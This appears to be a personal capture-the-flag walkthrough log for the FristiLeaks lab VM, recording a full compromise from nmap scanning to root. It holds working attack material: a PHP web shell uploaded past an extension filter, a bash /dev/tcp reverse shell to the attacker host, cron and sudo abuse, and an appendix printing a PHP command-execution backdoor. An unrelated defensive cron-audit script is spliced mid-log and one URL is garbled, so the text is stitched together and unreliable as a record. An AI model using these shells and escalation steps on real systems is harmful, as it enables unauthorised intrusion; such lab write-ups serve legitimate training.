host: 192.168.56.1
dhcp-server: 192.168.56.100
kali: 192.168.56.101
* log
# 2015/12/24 14:45 -> 16:30 (1hr 45min)
# 2015/12/25 15:00 -> 17:45 (2hr 45min)
# total time = 4hrs 30min
* discovery - target
* nmap --min-parallelism=100 -sP -T5 192.168.56.0/24
* found target: 192.168.56.102
* discovery - services
* nmap --min-parallelism=100 -A -T5 -p1-65535 192.168.56.102
* found ports: 80
* enumerate port 80
* wget http://192.168.56.102
* cat index.html
* wget http://192.168.56.102/images/keep-calm.png
* wget http://192.168.56.102/robots.txt
* robots.txt: disallow /cola /sisi /beer
* wget http://192.168.56.102/cola/
* since /cola isn't the URL, and the page says we should drink fristi
* wget http://192.168.56.102/fristi/
* cat index.html
* read description meta tag reg comment about base64
* noticed second commented out base64
* suspect username: eezeepz
* extracted commented out line using vi
* deleted other lines
* joined all lines (:%j)
* removed spaces (:%s/\ //g)
* saved into fristi_img2.txt
* base64 -d fristi_img2.txt > img2
* file img2
* mv img2 img2.png
* suspect password: keKkeKKeKKeKkEkkEk
* access
* http://192.168.56.102/fristi/
* myusername: eezeepz, mypassword: keKkeKKeKKeKkEkkEk
* logged into http://192.168.56.102/fristi/login_success.php
* clicked upload file link to http://192.168.56.102/fristi/upload.php
* uploaded img2.png and got message regarding /uploads
* verified upload location http://192.168.56.102/fristi/uploads/img2.png
* attempted shell access using weevely (failed)
* generated weevely shell: weevely generate password shell.php
* cp /usr/share/weevely/shell.php .
* attempted upload: only allowed png,jpg,gif
* mv shell.php shell.gif
* uploaded and connected
* weevely http://192.168.56.102/fristi/uploads/shell.gif password
* fixed python issues (weevely needed PySocks)
* tar zxvf PySocks-1.5.6.tar.gz
* cd PySocks-1.5.6/
* ./setup.py build
* ./setup.py install
* weevely http://192.168.56.102/fristi/uploads/shell.gif password
* unable to connect
* used old script to execute commands
* renamed to shell.php.jpg
* uploaded file
* curl http://192.168.56.102/fristi/uploads/shell.php.jpg?cmd=id
* uid=48(apache) gid=48(apache) groups=48(apache)
* curl http://192.168.56.102/fristi/uploads/shell.php.jpg -d cmd="cat /etc/passwd"
* found: eezeepz, admin, fristigod, fristi
* ls -l /home/
* found: drwx---r-x. on eezeepz
* ls -l /home/eezeepz
* found:
* notes.txt
* commands (various)
* cat /home/eezeepz/notes.txt
* found:
* cron runs /tmp/runthis with admin privileges every minute
* commands chmod, df, cat, echo, ps, grep, egrep in /home/admin
* access to /usr/bin/*
* changed access to /home/admin
* curl http://192s/shell.php.jpg -d cmd="echo '/home/admin/chmod 755 /home/admin/' > /tmp/runthis"
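The /tmp/runthis cron job is the kind of finding a simple audit catches. This added Python example (not from the write-up) parses /etc/crontab-style lines and flags jobs whose target an unprivileged user could write or create; the directory layout and crontab lines are constructed.

```python
import os
import stat
import tempfile


def risky_cron_target(path):
    """Return a reason if an unprivileged user could control what PATH runs,
    else None. Only mode bits are inspected, so this runs as any user."""
    parent = os.path.dirname(path) or "."
    try:
        pmode = os.stat(parent).st_mode
    except FileNotFoundError:
        return None
    parent_open = bool(pmode & stat.S_IWOTH)
    try:
        mode = os.stat(path).st_mode
    except FileNotFoundError:
        # Anyone can create the file, exactly the /tmp/runthis situation.
        return "missing target in world-writable directory" if parent_open else None
    if mode & stat.S_IWOTH:
        return "world-writable target"
    if parent_open and not (pmode & stat.S_ISVTX):
        return "target in world-writable directory without sticky bit"
    return None


def audit_system_crontab(text):
    """Parse /etc/crontab-style lines (5 time fields, user, command) and
    return (user, target, reason) for every job with a controllable target."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or VAR=value line
        fields = line.split(None, 6)
        if len(fields) < 7:
            continue
        user, command = fields[5], fields[6]
        reason = risky_cron_target(command.split()[0])
        if reason:
            findings.append((user, command.split()[0], reason))
    return findings


def demo():
    """Constructed layout: a sticky /tmp-like dir holding a 0777 script."""
    d = tempfile.mkdtemp()
    os.chmod(d, 0o1777)
    for name, mode in (("runthis", 0o777), ("safe.sh", 0o755)):
        open(os.path.join(d, name), "w").close()
        os.chmod(os.path.join(d, name), mode)
    crontab = (f"PATH=/usr/bin:/bin\n* * * * * root {d}/runthis\n"
               f"0 3 * * * root {d}/safe.sh --quiet\n* * * * * admin {d}/missing\n")
    return audit_system_crontab(crontab)


if __name__ == "__main__":
    for user, target, reason in demo():
        print(f"{user}: {target}: {reason}")
```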
* ls -las /home/admin/
* found: cryptedpass.txt, cryptpass.py, and whoisyourgodnow.txt (owned by fristigod)
* cat /home/admin/whoisyourgodnow.txt
* found: =RFn0AKnlMHMPIzpyuTI0ITG
* cat /home/admin/cryptedpass.txt
* found: mVGZ3O3omkJLmy2pcuTq
* cat /home/admin/cryptpass.py
* found:
* function base64-encodes the string, reverses it, then applies rot13
* created own script to decrypt password
* python ./decryptpass.py mVGZ3O3omkJLmy2pcuTq
* found: thisisalsopw123
* python ./decryptpass.py =RFn0AKnlMHMPIzpyuTI0ITG
* found: LetThereBeFristi!
* interactive shell
* got tired of using the php script and decided to get interactive shell
* on kali: nc -n -vvv -l -p 80
* ran via php: /bin/bash -i > /dev/tcp/192.168.56.101/80 0<&1 2>&1, but encoded for url as %2Fbin%2Fbash%20-i%20%3E%20%2Fdev%2Ftcp%2F192.168.56.101%2F80%200%3C%261%202%3E%261
* now have shell (without TTY, so cannot use su yet)
* find files owned by users
* find / -user eezeepz 2>&1 | grep -v "Permission denied"
* find / -user admin 2>&1 | grep -v "Permission denied"
* find / -user fristi 2>&1 | grep -v "Permission denied"
* find / -user fristigod 2>&1 | grep -v "Permission denied"
* found: /var/fristigod
* found: empty mailboxes
* found: /var/www/notes.txt
* not very useful since we already figured this out
* tried to get tty shell
// https://pen-testing.sans.org/blog/2014/07/08/sneaky-stealthy-su-in-web-shells
// http://netsec.ws/?p=337
* /usr/bin/python -c 'import pty; pty.spawn("/bin/sh")'
* used: su fristigod and password: LetThereBeFristi!
* cd /var/fristigod
* ls -las
* found: .bash_history and .secret_admin_stuff
* cat .bash_history
* found: sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
* ls -las /var/fristigod/.secret_admin_stuff/
* found: suid/guid set on doCom file and owned by root:root
* file /var/fristigod/.secret_admin_stuff/doCom
* strings /var/fristigod/.secret_admin_stuff/doCom
* sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
* found: Usage: ./program_name terminal_command ...
* sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom id
* found: uid=0(root) gid=100(users) groups=100(users),502(fristigod)
* sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom bash
!! got root !!
* found: cat /root/fristileaks_secrets.txt
* cat /root/fristileaks_secrets.txt
* found: Flag: Y0u_kn0w_y0u_l0ve_fr1st1
# Other
* /root/.c has source for doCom
* cat /root/.mysql_history
* appendix
// http://snipplr.com/view/72936/simple-php-backdoor-shell/
-- start of old script --
<?php
if (isset($_REQUEST['cmd'])) {
    $cmd = $_REQUEST['cmd'];
    system($cmd);
    echo "<pre>$cmd</pre>";
} else {
    echo "<pre>usage: ?cmd=</pre>";
}
?>
-- end of old script --
// modified cryptpass.py script (made Python 3 compatible; indentation restored)
-- start of decryptpass.py script --
import base64
import codecs
import sys


# same scheme as cryptpass.py: base64, reverse, then rot13 (kept for reference)
def encodeString(s):
    base64string = base64.b64encode(s.encode()).decode()
    return codecs.encode(base64string[::-1], 'rot13')


# undo it: reverse, rot13 (reverse and rot13 commute), then base64-decode
def decodeString(s):
    rottedString = codecs.encode(s[::-1], 'rot13')
    return base64.b64decode(rottedString).decode()


if __name__ == '__main__':
    print(decodeString(sys.argv[1]))
-- end of decryptpass.py script --